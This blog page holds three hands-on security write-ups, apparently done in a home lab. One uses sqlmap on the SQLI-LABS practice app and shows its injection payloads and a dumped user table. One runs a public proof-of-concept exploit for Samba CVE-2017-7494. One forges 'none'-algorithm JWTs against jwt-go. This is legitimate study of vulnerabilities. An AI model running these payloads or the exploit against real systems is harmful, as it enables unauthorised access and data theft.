まったり技術ブログ

Technology is power.

SQLインジェクション体験ツール『SQLI-LABS』で遊ぶ

f:id:motikan2010:20170611163739j:plain
今回使ってみた「SQLI-LABS」には65種類(問題一覧からは75問あるように見えたが404だった…)のSQLiを学べるらしいので早速遊んでみました。
動作DBはMySQLです。

github.com

環境構築

インストール

インストールは非常に簡単で、リポジトリをWebサーバ上のドキュメントルート上に配置するだけ。

$ cd /var/www/html/
$ git clone https://github.com/Audi-1/sqli-labs.git
$ cd sqli-labs

データベース設定

「security」データベース参照が固定になっているので、
ここで変更するのは、ユーザ名とパスワードだけがいいです。

$ vim sql-connections/db-creds.inc
<?php

//give your mysql connection username n password
$dbuser ='root';
$dbpass ='';
$dbname ="security";
$host = 'localhost';
$dbname1 = "challenges";
?>

データベース・テーブル初期化

http://(Webサーバ)/sqli-labs/」にアクセスします。f:id:motikan2010:20170611100736p:plain
[Setup/reset Database for labs]にアクセスすると使用するデータベースの初期化行われます。

f:id:motikan2010:20170611101218j:plain

これで「SQLI-LABS」が使えるようになります。

動作確認

一番簡単であろう、「Less-1 (GET - Error based - Single quotes - String)」からさわってみます。
f:id:motikan2010:20170611141146j:plain

「idパラメータに数字を入力」と書かれた黒い画面が表示されます。 f:id:motikan2010:20170611140728j:plain
指示通りに「?id=1」を入力します。 f:id:motikan2010:20170611142107j:plain
ユーザ情報が表示されました。いかにもidパラメータにSQLiがありそう。
次に「'」を入力します。 DBエラーになりました。 f:id:motikan2010:20170611142619j:plain
「'‘」を入力。
今度はエラーにならないことから、やはり「id」パラメータにSQLiの疑いがあります。 f:id:motikan2010:20170611142901j:plain

sqlmapでSQLi

手動でテーブル等を取得するのも手間なので、ここは自動でSQLiの検出、SQLiを利用してのデータ取得を自動的に行ってくれる「sqlmap」を使ってみます。
難易度が上がるごとに、手動だと検出さえできないものもあるかと思いますので、早速使用していきます。
github.com

ツールの使用オプションなどはこちらを参照。

Usage · sqlmapproject/sqlmap Wiki · GitHub

Less-1 (GET - Error based - Single quotes - String)

「—」の間に表示されているのが、検出されたSQLiの種類を表している。
テーブルの内容も取得できていることが分かる。改めてSQLiコワイ。

$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dump
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4906=4906 AND 'gcKD'='gcKD

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9809 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(9809=9809,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uTqI'='uTqI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'aTCG'='aTCG

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6200' UNION ALL SELECT NULL,CONCAT(0x71786b7a71,0x556f6374546f58637a724149634156656161507666636d644a4c7264676271716f754a6f6f525945,0x7162767a71),NULL-- bzyx
---

(中略)

Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

(以下省略)

どんどんレベルを上げていくことにする。
下記3つも特にオプションを指定せずに、テーブルの内容を取得することができた。

  • Less-2 (GET - Error based - Intiger based)
  • Less-3 (GET - Error based - Single quotes with twist - string)
  • Less-4 (GET - Error based - Double Quotes - String)

Less-5 (GET - Double Injection - Single Quotes - String)

時間短縮のために下記2点を変更しました。

  • 「–dbms MySQL」オプションの付与
  • 「–dump」オプション(レコード内容を取得)を「–banner」オプション(DBのバナー情報を取得)に変更
$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-5/?id=1" --banner --dbms MySQL

(中略)

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5282=5282 AND 'FCUt'='FCUt

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 6146 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT (ELT(6146=6146,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vYqp'='vYqp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'KeMK'='KeMK
---

(中略)

web server operating system: Linux CentOS 6.8
web application technology: PHP 5.4.36, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
banner:    '5.1.73-log'

続けて、下記4点も突破することができた。

  • Less-6 (GET - Double Ingection - Double Quotes - String)
  • Less-7 (GET - Dump into outfile - String)
  • Less-8 (GET - Blind - Boolian Based - Single Quotes)
  • Less-9 (GET - Blind - Time based. - Single Quotes)

Less-10 (GET - Blind - Time based - double quotes)

level 1 ⇒ 失敗
$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-10/?id=1" --banner --dbms MySQL

(中略)

[09:06:48] [WARNING] GET parameter 'id' does not seem to be injectable

デフォルトでは「--level」オプションの値は"1"になっていますので、今度は「--level 2」オプションを付与してやってみます。

level 2 ⇒ 成功
$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-10/?id=1" --banner --dbms MySQL --level 2

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1" AND 1115=1115 AND "FYxx"="FYxx

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1" AND SLEEP(5) AND "Kufp"="Kufp
---

Less-11 (POST - Error Based - Single quotes - String)

$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-11/" --data="uname=Dumb&passwd=Dumb&submit=Submit" --dbms MySQL

---
Parameter: passwd (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=Dumb&passwd=Dumb' AND 7224=7224 AND 'XczC'='XczC&submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=Dumb&passwd=Dumb' AND (SELECT 5640 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(5640=5640,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iIig'='iIig&submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: uname=Dumb&passwd=Dumb' AND SLEEP(5) AND 'nfze'='nfze&submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=Dumb&passwd=-3874' UNION ALL SELECT CONCAT(0x7176767171,0x59794449726d6876654c757179796c4d50685572796a746d796a6c747a756a4c4b5073507a595746,0x716b627671),NULL-- LzoO&submit=Submit

Parameter: uname (POST)
    Type: boolean-based blind

(以下省略)
---

網羅するのも大変ですので、気になるタイトルのものに手をつけてみます。

Less-18 (POST - Header Injection - Uagent field - Error based)

$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-18/index.php" --data="uname=Dumb&passwd=Dumb&submit=Submit" --headers="User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36" --dbms MySQL --level 3

---
Parameter: User-Agent (User-Agent)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36' AND (SELECT 8176 FROM(SELECT COUNT(*),CONCAT(0x7171717171,(SELECT (ELT(8176=8176,1))),0x71707a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'canv'='canv

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36' OR SLEEP(5) AND 'emKT'='emKT
---

Less-23 (GET - Error based - strip comments)

$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-23/?id=1" --banner --dbms MySQL

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6234=6234 AND 'sZEB'='sZEB

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2226 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(2226=2226,1))),0x71707a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sIMQ'='sIMQ

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'gHxA'='gHxA
---

Less-53 (GET - Blind based - ORDER BY CLAUSE - String - stacked injection)

$ python2.6 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-53/?sort=0" --banner --dbms MySQL --level 2

---
Parameter: sort (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: sort=0' RLIKE (SELECT (CASE WHEN (1167=1167) THEN 0 ELSE 0x28 END)) AND 'uqmm'='uqmm

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=0' AND (SELECT * FROM (SELECT(SLEEP(5)))VcHi) AND 'ISSZ'='ISSZ
---

(中略)

web server operating system: Linux CentOS 6.8
web application technology: PHP 5.4.36, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
banner:    '5.1.73-log'

「SQLi-LABS Page-4 (Challenges)」は回数制限ありのSQLiの問題が集まっているようでした。SQLi力のない私はそっとじ・・・。

 軽く「SQLI-LABS」をさわってみましたが、sqlmapを使うための学習にうってつけのツールでした。

Sambaの脆弱性〜CVE-2017-7494をやってみる〜

f:id:motikan2010:20170531012815p:plain

5月24日に公開された、ファイル共有によく利用されるSambaの脆弱性「CVE-2017-7494」を実際に構築・PoCでの検証を行ってみます。
f:id:motikan2010:20170531215510j:plain

概要・対策に関しては、下記の記事が参考になる。

CVE-2017-7494 - Red Hat Customer Portal

oss.sios.com

環境構築

  • OS:Centos 6.9

Sambaのインストール事前準備

$ yum install -y gcc
$ yum install -y python-devel
$ yum install -y gnutls-devel
$ yum install -y libacl-devel
$ yum install -y openldap-devel

Samba(4.5.9)をインストール

今回は脆弱性が存在しているバージョン(4.5.9)を利用します。
古いバージョンですので、ソースからインストールしてみます。

$ wget https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz
$ tar zxvf samba-4.5.9.tar.gz
$ cd samba-4.5.9
$ ./configure
$ make
$ make install

# 下記のディレクトリが作成されており、インストールされていることが確認できます。
$ ls /usr/local/samba/
bin  etc  include  lib  lib64  private  sbin  share  var

# 設定ファイルを設置
$ cp examples/smb.conf.default /usr/local/samba/etc/smb.conf

外部からの通信許可

iptableファイルを編集し、外部からSambaに対して通信の許可を行います。

$ vim /etc/sysconfig/iptables
下記のルールを追加
-A INPUT -m state --state NEW -m udp -p udp --dport 137 -j ACCEPT
-A INPUT -m state --state NEW -m udp -p udp --dport 138 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 139 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 445 -j ACCEPT

# iptables再起動
$ service iptables restart

動作確認

設置した設定ファイルが正常に読み込まれるかを確認します。

$ cd /usr/local/samba/

$ bin/testparm
Load smb config files from /usr/local/samba/etc/smb.conf
rlimit_max: increasing rlimit_max (1024) to minimum Windows limit (16384)
Processing section "[homes]"
Processing section "[printers]"
Loaded services file OK.
Server role: ROLE_STANDALONE

Press enter to see a dump of your service definitions

# Global parameters
[global]
    server string = Samba Server
    workgroup = MYGROUP
    log file = /usr/local/samba/var/log.%m
    max log size = 50
    server role = standalone server
    dns proxy = No
    idmap config * : backend = tdb


[homes]
    comment = Home Directories
    browseable = No
    read only = No


[printers]
    comment = All Printers
    path = /usr/spool/samba
    browseable = No
    printable = Yes

Samba設定が表示され、正常に読み込まれていることが確認でます。

Sambaアカウントの作成

$ useradd samba -p sambpass
$ bin/smbpasswd -a samba
New SMB password:(sambpass)
Retype new SMB password:(sambpass)
Added user samba.

外部からのSambaへの接続を許可する

初期設定では、内部からのみアクセス可能になっています。

;   hosts allow = 192.168.1. 192.168.2. 127.
↓ 下記のように、アクセス元のIPアドレスに修正
hosts allow = 157.XXX.XXX.XXX

Sambaを起動

下記のコマンドでSambaを起動することができます。

$ sbin/smbd
$ sbin/nmbd

プロセスの確認

Sambaが動作していることを確認することができます。

$ ps aux | grep smbd
root      4228  0.0  0.5 394700  6048 ?        Ss   23:08   0:00 sbin/smbd
root      4229  0.0  0.2 386240  2620 ?        S    23:08   0:00 sbin/smbd
root      4230  0.0  0.2 386232  2340 ?        S    23:08   0:00 sbin/smbd
root      4232  0.0  0.3 394708  3124 ?        S    23:08   0:00 sbin/smbd
root      4236  0.0  0.0 103344   900 pts/0    R+   23:08   0:00 grep smbd
$ ps aux | grep nmbd
root      4234  0.0  0.2 320588  2688 ?        Ss   23:08   0:00 sbin/nmbd
root      4238  0.0  0.0 103344   912 pts/0    S+   23:08   0:00 grep nmbd

Sambaへ接続

Sambaクライアントをインストールし、外部から接続できることを確認します。

# Sambaクライアントのインストール
$ yum -y install samba-client

# Sambaクライアントで接続
$ smbclient --user=samba //163.XXX.XXX.XXX/homes
Enter samba's password:(smbpass)
Domain=[MYGROUP] OS=[Windows 6.1] Server=[Samba 4.5.9]
smb: \> ls
  .                                   D        0  Tue May 30 23:40:20 2017
  ..                                  D        0  Tue May 30 23:22:52 2017
  .bash_profile                       H      176  Thu Mar 23 09:15:00 2017
  .bashrc                             H      124  Thu Mar 23 09:15:00 2017
  .bash_logout                        H       18  Thu Mar 23 09:15:00 2017

接続元のカレントディレクトリに「Sample.txt」がある場合に、ファイルのアップロード

smb: \> put Sample.txt
smb: \> ls Sample.txt
  Sample.txt                          A        0  Tue May 30 23:50:43 2017

PoCを試してみる

攻撃側のGit等のツールはインストール済みの状態から初めてみます。
ここからはPoCを実行する「攻撃側」、Sambaが動作している「Samba側」を分けて記述していきます。

こちらのPoCを利用します。
github.com

攻撃側

アップロードする共有ライブラリの準備を行っていきます。

$ git clone https://github.com/omri9741/cve-2017-7494.git
$ cd cve-2017-7494/
$ python --version
Python 2.7.9
$ pip install -r requirements.txt

$ cd payload
$ chmod +x build.sh
$ ./build.sh
$ ls libpoc.so
libpoc.so
$ cd ..
$ mv payload/libpoc.so .

読み込ませる共有ライブラリをSambaの共有領域内に配置します。

$ smbclient --user=samba //163.XXX.XXX.XXX/homes
Enter samba's password:
Domain=[MYGROUP] OS=[Windows 6.1] Server=[Samba 4.5.9]

smb: \> put libpoc.so
putting file libpoc.so as \libpoc.so (1918.9 kb/s) (average 1918.9 kb/s)
Samba側

libpoc.soが配置されていることを確認します。
さらに、今回はPoCが実行されることを確認しやすいように、Sambaはデバッグモードで起動します。
これでSambaが動作中にどのようなモジュールを読み込むのかなどを確認することができます。

$ ls -l /home/samba/libpoc.so
-rwxr-xr-x 1 samba samba 5895  5月 31 00:10 2017 /home/samba/libpoc.so

# Sambaを停止
$ pkill smbd

# デバッグモードでSambaを起動
$ sbin/smbd -i --debuglevel=10

PoCを実行

攻撃側
$ python2.7 exploit.py -t 163.XXX.XXX.XXX -m /home/samba/libpoc.so
Samba側(デバッグ内容)
Probing module '/home/samba/libpoc.so'
Error loading module '/home/samba/libpoc.so': /home/samba/libpoc.so: 共有オブジェクトファイルを開けません: 許可がありません
is_known_pipename: /home/samba/libpoc.so unknown

メッセージから分かるとおり、権限がなく失敗しています。
パーミッションを少し変更してみます。
パーミッションは「drwx — –x」となり、パブリックフォルダだと考えれば、ありそうな感じ。

$ ls -l /home/
drwx------ 2 samba samba 4096  5月 31 00:24 2017 samba

$ chmod 701 /home/samba
$ ls -l /home/
drwx-----x 2 samba samba 4096  5月 31 00:24 2017 samba
追記(2017/5/31)

後々調べてみると、アクセスできない理由は、共有オブジェクトファイルをロードする権限がnobodyユーザ権限であるかららしい。
下記はPoCのオブジェクトファイル内で「id」コマンドを実行してみた結果。

Probing module '/home/samba/libpoc.so'
Module '/home/samba/libpoc.so' loaded
uid=99(nobody) gid=0(root) 所属グループ=0(root),99(nobody)

/home/sambaのパーミッションが700だと、当然ながらnobodyユーザではアクセスすることができない。

$ sudo -u nobody cat /home/samba/libpoc.so
cat: /home/samba/libpoc.so: 許可がありません

再度PoCを実行してみます。

libpoc.so内のコードが実行されれば成功です。

攻撃側

先ほどと同様に実行します。

$ python2.7 exploit.py -t 163.XXX.XXX.XXX -m /home/samba/libpoc.so
Samba側(デバッグ内容)
Probing module '/home/samba/libpoc.so'
Module '/home/samba/libpoc.so' loaded
hello from cve-2017-7494 poc! ;)

「hello from cve-2017-7494 poc! ;)」が表示され、なんとか実行することができた。

まとめ

今回はVPS間で検証を行ってみたが、自宅PCのSambaクライアントからVPS上のSambaに接続することができなかった。少し調べてみると下記のような記事を見つけた。
私もこれが原因だったのだろうか。
Sambaは外部ネットワーク(WAN)に公開できない? | meideru blog

そうだとするとSambaは元々外部に公開するために作られたものではなさそう。
確かにネット上で Windowsファイル共有は使ったことがなく、ローカルで使われているイメージがある。外部に公開されているのがレアだと考えると、この脆弱性でなにか問題が起こるのはなさそう。

【セキュリティ】jwt-goを使ってみる - その2

f:id:motikan2010:20170514015521p:plain
前回に引き続き「jwt-go」でいろいろ試してみます。

motikan2010.hatenadiary.com

主に署名アルゴリズムの改ざんでの動作確認を行っていきます。

動作確認

署名アルゴリズムを改ざん

なぜこんなことを試すのかというと、下記の記事を読んでみると、トークン内の署名アルゴリズムを改ざんしてリクエストを送信すると、改ざん後の署名アルゴリズムで署名の検証が行われる実装があるようです。

oauth.jp

それを"jwt-go"の場合だとどのような動作をするのかを確認してみます。
f:id:motikan2010:20170514014545j:plain

確認に使うソースコードは前回と同様です。

jwt-go_Sample/main.go at master · motikan/jwt-go_Sample · GitHub

トークンを取得
$ curl -v http://example.jp:8080/api/
GET /api/ HTTP/1.1
Host: example.jp:8080

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 May 2017 14:18:34 GMT
Content-Length: 144

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ.iTEWurGMvi1d90yMW0OnqbQ0QDEyB-UD4TmYF9YQXYY"}

トークンヘッダの署名アルゴリスムを改ざんします。

bsae64エンコード
改ざん前 {“alg”:“HS256”,“typ”:“JWT”} eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
改ざん後 {“alg”:“none”,“typ”:“JWT”} eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K
②署名アルゴリズムを"none"に改ざんしてリクエストを送信
$ curl -v http://example.jp:8080/api/private/ -H "Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ."
GET /api/private/ HTTP/1.1
Host: example.jp:8080
Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ.

HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
Date: Sat, 13 May 2017 14:30:26 GMT
Content-Length: 49

{"error":"'none' signature type is not allowed"}

ステータスコードは「401 Unauthorized」、レスポンスボディに「'none' signature type is not allowed」とある通り、 改ざん後の署名アルゴリズムが適用されず、署名の検証には失敗しました
f:id:motikan2010:20170514014735j:plain

トークン発行時「SHA256」、検証には「none」

“none"にするため、ソースコードの下記の部分を変更します。

/*
   署名の検証
*/
token, err := request.ParseFromRequest(c.Request, request.OAuth2Extractor, func(token *jwt.Token) (interface{}, error) {
    //b := []byte(secretKey)
    b := jwt.UnsafeAllowNoneSignatureType
    return b, nil
})

f:id:motikan2010:20170514015036j:plain

署名アルゴリズムを"none"に改ざんしてリクエストを送信
$ curl -v http://example.jp:8080/api/private/ -H "Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ."
GET /api/private/ HTTP/1.1
Host: example.jp:8080
Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ.

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 May 2017 15:46:04 GMT
Content-Length: 56

{"message":"こんにちは、「 ゲスト 」さん"}

署名の検証が行われていないことがわかる。

おまけ

ちなみに署名アルゴリズムnoneに指定した状態で、シグネチャを付与しリクエストを送信した場合は、以下のようなエラーになりました。

base64エンコード
{“alg”:“none”,“typ”:“JWT”} eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K
$ curl -v http://example.jp:8080/api/private/ -H "Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ.SetZ6qLSbfIObsaZSNGS4hVh5h8ob0Kr4h1fJGA75-s"
GET /api/private/ HTTP/1.1
Host: example.jp:8080
Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0K.eyJleHAiOjE0OTQ2OTM4NDgsInVzZXIiOiLjgrLjgrnjg4gifQ.SetZ6qLSbfIObsaZSNGS4hVh5h8ob0Kr4h1fJGA75-s

HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
Date: Sat, 13 May 2017 16:11:03 GMT
Content-Length: 59

{"error":"'none' signing method with non-empty signature"}

“none"場合はシグネチャを付与するなと怒られました。

トークン発行時「none」、検証には「SHA256」

f:id:motikan2010:20170514014808j:plain

トークンを取得
$ curl -v http://example.jp:8080/api/
GET /api/ HTTP/1.1
Host: example.jp:8080
User-Agent: curl/7.43.0
Accept: */*

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 May 2017 16:18:49 GMT
Content-Length: 100

{"token":"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJleHAiOjE0OTQ2OTU5MjksInVzZXIiOiLjgrLjgrnjg4gifQ."}
②受信したトークンを取得
$ curl -v http://example.jp:8080/api/private/ -H "Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJleHAiOjE0OTQ2OTU5MjksInVzZXIiOiLjgrLjgrnjg4gifQ."
GET /api/private/ HTTP/1.1
Host: example.jp:8080
Authorization: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJleHAiOjE0OTQ2OTU5MjksInVzZXIiOiLjgrLjgrnjg4gifQ.

HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
Date: Sat, 13 May 2017 16:21:08 GMT
Content-Length: 49

{"error":"'none' signature type is not allowed"}

エラーになりました。

トークンの発行時に署名アルゴリズムに"none"が指定されたというのは、検証時には関係ありませんでした。

結論:検証は検証時に使用する署名アルゴリズムに依存するようです。 (noneは指定するな。指定するための「UnsafeAllowNoneSignatureType」というワードはいかにも怪しいが・・・。)

おわり🏠


次はもっとセキュリティ色の強い記事を書きたい…。